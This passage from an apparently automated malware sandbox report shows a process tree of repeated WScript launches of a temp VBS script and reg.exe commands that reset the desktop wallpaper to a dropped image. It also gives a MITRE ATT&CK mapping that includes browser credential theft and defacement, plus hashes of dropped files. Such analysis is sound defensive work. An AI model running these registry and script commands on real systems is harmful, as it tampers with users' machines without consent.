    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:6856
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:7032
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6988
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:7032
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6988
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7032
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:6804
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:7032
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:7196
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:7208
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:7224
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7236
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:7252
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:7268
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:7296
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:7316
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:7500
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7516
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:7532
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:7540
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:7576
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:7588
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:7600
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7616
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:7672
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:7688
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:7716
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:7732
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:7900
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7916
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:7932
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:7948
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:7972
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:7984
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:7996
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:8008
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:8024
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:8052
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:8064
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:7476
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:7624
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7948
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:7988
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:7996
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:8056
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:8068
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:8112
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:8088
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:7484
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:7488
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:7624
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:7956
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:7980
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:8056
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:8136
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:7208
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:7272
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:7716
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:7976
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7948
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:8072
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:7312
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:7480
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:7972
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:8008
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7948
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:7488
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:7976
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:8008
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:7980
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:7948
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7972
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:7976
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:8196
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:8280
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:8296
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:8312
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:8324
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:8340
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:8352
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:8380
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:8392
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:8404
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:8416
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:8448
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:8464
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:8480
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:8500
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:8512
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:8528
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:8544
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:8572
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:8584
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:8596
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:8608
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:8620
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:8636
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:8648
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:8668
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:8696
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
    3⤵
    PID:1392
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
    3⤵
    PID:2604
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
    3⤵
    PID:2184
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
    3⤵
    PID:2764
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
    3⤵
    PID:2016
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
    3⤵
    PID:3812
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
    3⤵
    PID:1748
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
    3⤵
    PID:3016
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
    3⤵
    PID:3764
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
    3⤵
    PID:1484
- - C:\Users\Admin\AppData\Local\Temp\melter.exe
    melter.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:8

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004BC 0x00000000000004CC
1⤵
PID:868

C:\Windows\System32\PickerHost.exe
C:\Windows\System32\PickerHost.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4412

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5532

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5676

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Umbral.exe.log

Filesize
1KB

MD5
5f36c205799cb2f8966c7d5130cea05c

SHA1
614993e3437ff9363c3eb698d7dba379a453dd6e

SHA256
8eaaf40fe7570c8fa593702f38fee2f54538ba6a77d7c54005e8d1f150f5180c

SHA512
7053cac09d2e71675771bae4ac25f1a47f96be662f6bb2aab24668ed4c1809fb1261b2d6465202c09bd0310bf875361a815db6dda6006dcfbbb5fb3c50c5927b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\e4a7bacd-0b4f-4ad3-8c19-70004fb872ac.dmp

Filesize
3.3MB

MD5
2265733dd69be2d428ad02d9269bad5d

SHA1
9a35f34232894af34338edc4a20043ce82308504

SHA256
364144072c4a1bdfecb6ad3165e076c95bfb67beb9c0d15990d11275d2b58b63

SHA512
fe6797aad5976ffc9ab7b4372945f5c8cef8a2c274e293591eb28cde9b0ea48699a2f975d4aa880f19d5db58bc6738bfc05c1e6100793f3f424f364197d281ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e8115549491cca16e7bfdfec9db7f89a

SHA1
d1eb5c8263cbe146cd88953bb9886c3aeb262742

SHA256
dfa9a8b54936607a5250bec0ed3e2a24f96f4929ca550115a91d0d5d68e4d08e

SHA512
851207c15de3531bd230baf02a8a96550b81649ccbdd44ad74875d97a700271ef96e8be6e1c95b2a0119561aee24729cb55c29eb0b3455473688ef9132ed7f54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
3e2612636cf368bc811fdc8db09e037d

SHA1
d69e34379f97e35083f4c4ea1249e6f1a5f51d56

SHA256
2eecaacf3f2582e202689a16b0ac1715c628d32f54261671cf67ba6abbf6c9f9

SHA512
b3cc3bf967d014f522e6811448c4792eed730e72547f83eb4974e832e958deb7e7f4c3ce8e0ed6f9c110525d0b12f7fe7ab80a914c2fe492e1f2d321ef47f96d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\01b75cac-801b-41d5-a909-1d587ecee83d.tmp

Filesize
6KB

MD5
cd73bda3ddb0322b65cd103465da6092

SHA1
54c0e6de9c5b6761fef0b04e8d6c173b99bfb086

SHA256
879cecf61dd2705c04275e7c7f5df8837925b5454f130e9ff634f8a06f19b19c

SHA512
bcc7921d22e2fb4c275e1a3c9553a28a6c0382ca5cc17b8f307cb7cebada26294b1139b92234f9318f76139c67b3cebf46c16058b813aa2a8da969fdf1d782f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

Filesize
44KB

MD5
2b609a32e6d4ca4a073ddd33132aad93

SHA1
96fa3f6964dfe19924b96a37b867643fccb226a3

SHA256
8370cca929cb8efdcc9781dec4bf18ef166b6cc26ca268a495e7b22d986f5bfe

SHA512
0ef3dc4256614da97c7aa9723648e3573f26d93ed69e3831de4e80a02464a0a4a6929ffd984b193a84a80a3d668ecc4f81efd06f1def10c809e10067c738fd09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

Filesize
264KB

MD5
c90f5e5c871eeaf4d666de4d5b259a6e

SHA1
7fda7c24a2f340579ea3f50631d1812d008ab2d2

SHA256
4c7d6dc11b89b7d74607bef59b138bad2a19093c2f53bba8d05385840c464904

SHA512
b1a3500339c063f21b7e1d2e8fed6d3a273f84936d28de5f1d502e5bd6b3a19a1dad17918539d5984377b65535c2e7939a4ba6c32dc9bcecb32b97b88ed5a244

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3

Filesize
4.0MB

MD5
80fc131eff4e41dfe3771cbc7df8dd3c

SHA1
0275724be910b852dd59d7f91396db83d2734dc2

SHA256
aee8717b3c7a0e1e7dc3871d68e825b28d35ddad7b733c938045a7ff1aaeae8d

SHA512
40a578f962d4672ec42617603743a1ab9c8ade52044f0bce31ac8075588b983b97bed8547a74f18f20e5ea91607ebb20400ac3399ab75954e20252b1e85d56fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
bc624f54f0459c970dec3e25c0d63aad

SHA1
db6c7f6306c9178cf297ba0e8917cd07ddcf3385

SHA256
05feaca82024d3ffcc464c04616ef14124c900cedbbe95209914f27d368e7639

SHA512
a126dd6f3cf3dcea8546f4183f33a08356395a17f27a4f8e0233a4da6ae2da704b3b7c394eb9c06ef5d2725b42c49f5b9c5b0e5258c7fe991e45f36ef3fb1645

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
42a5875edd6e17f58025539846aafd59

SHA1
d0b052b62ddfcf493af1540561cc95a9cc8877e6

SHA256
562d25d3c8f0505986b8ffa967bad8e079057575f70b93432c010a0d55a54d14

SHA512
bfc0287122505e480b83bbee5798e9dbd1779af43d0d5e0aa22c888581f5578fd8e94f85b2a1dd6673d828ab4f5be67097316060c633840ea2f11e47f476b87e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

Filesize
44KB

MD5
72510d3a6dffea7cd88e55bc3069ca9e

SHA1
bf97f37c757763020a2d5d3ef51a8da75b47de25

SHA256
3fa00bfe2f81eac188ad7d6e4dca325d413becbc8d70fbfbfbec2391d4e7ebf5

SHA512
967186d544e281f07e1141993dfc3e4b1f06b672c134b011a05f80ec2beb5d19c8e83a99381f4d6fd5153b5360ab70bae30db0c170e05a7958924c376a9323c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

Filesize
264KB

MD5
ef85c1fc73c998cd0fead3fab3850fd8

SHA1
a67641d1eed173591b1f0953f58d14bb3cad3ae5

SHA256
c8fc219900512c7767cdbd6c37e98c37f71711557ba8e7bc4720bad63b33ea14

SHA512
80c48d84c1ac726a4cdbb5318bc7d640c15df5e29e42f7a3ec608324fcce5c3ce705504ec3f2f00d0503450cdc849bbd5b541e579bb400c1853014171d8569ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3

Filesize
4.0MB

MD5
0669229f86ef9e62461b525048f176d7

SHA1
356dc74c21e7d35507ccba6be498b5d7aa7b4e10

SHA256
cb560ec9583a612007174bc9ea5df4cd3c2725b258ae56ee83da5b1712a9df47

SHA512
ae2ca49d77eaee360a5429a114479e00873a45d5b46e37035ac36620630ec9baab0265d5d2c2b649710887e2c985b2468b9ea0cd8660eceda11de0d43905775f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

Filesize
11B

MD5
b29bcf9cd0e55f93000b4bb265a9810b

SHA1
e662b8c98bd5eced29495dbe2a8f1930e3f714b8

SHA256
f53ab2877a33ef4dbde62f23f0cbfb572924a80a3921f47fc080d680107064b4

SHA512
e15f515e4177d38d6bb83a939a0a8f901ce64dffe45e635063161497d527fbddaf2b1261195fde90b72b4c3e64ac0a0500003faceffcc749471733c9e83eb011

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
839a1e7d9914c7ffed29d60f6c1dff72

SHA1
635787867bcd2009321f0ddd3de0502afa626459

SHA256
46afd1d110ba06bf9b61885e1e87e9357848e0cf59e61e8aa2074d5eaf498482

SHA512
5814471923e484fa44e272c75da5dcf227592f4f8c5b01319bc83f2e015bca830854ca06994080e89c0418c9b4e34d181b1af8e6e5c45e83cb1216b7950a5518

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
80675a463a22d2a0791872e47737ce11

SHA1
8d9dfd7f851eddda1d0998b552541b17eeaae346

SHA256
ced7e356ce9cc2dad664718a3e70a018210f6cafdc3403cfb1464a472011f15f

SHA512
ca44fb4037b63ad2f724bcb95677ccb60ccd836f3a3dfae06cad63361a831ddcf9b2fdae6b56ece71987e009dd810fe954604abf10ed78e59f4419b1ad87a06c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

Filesize
704KB

MD5
51dc6a6d54af59bd360b0d80eb9f8175

SHA1
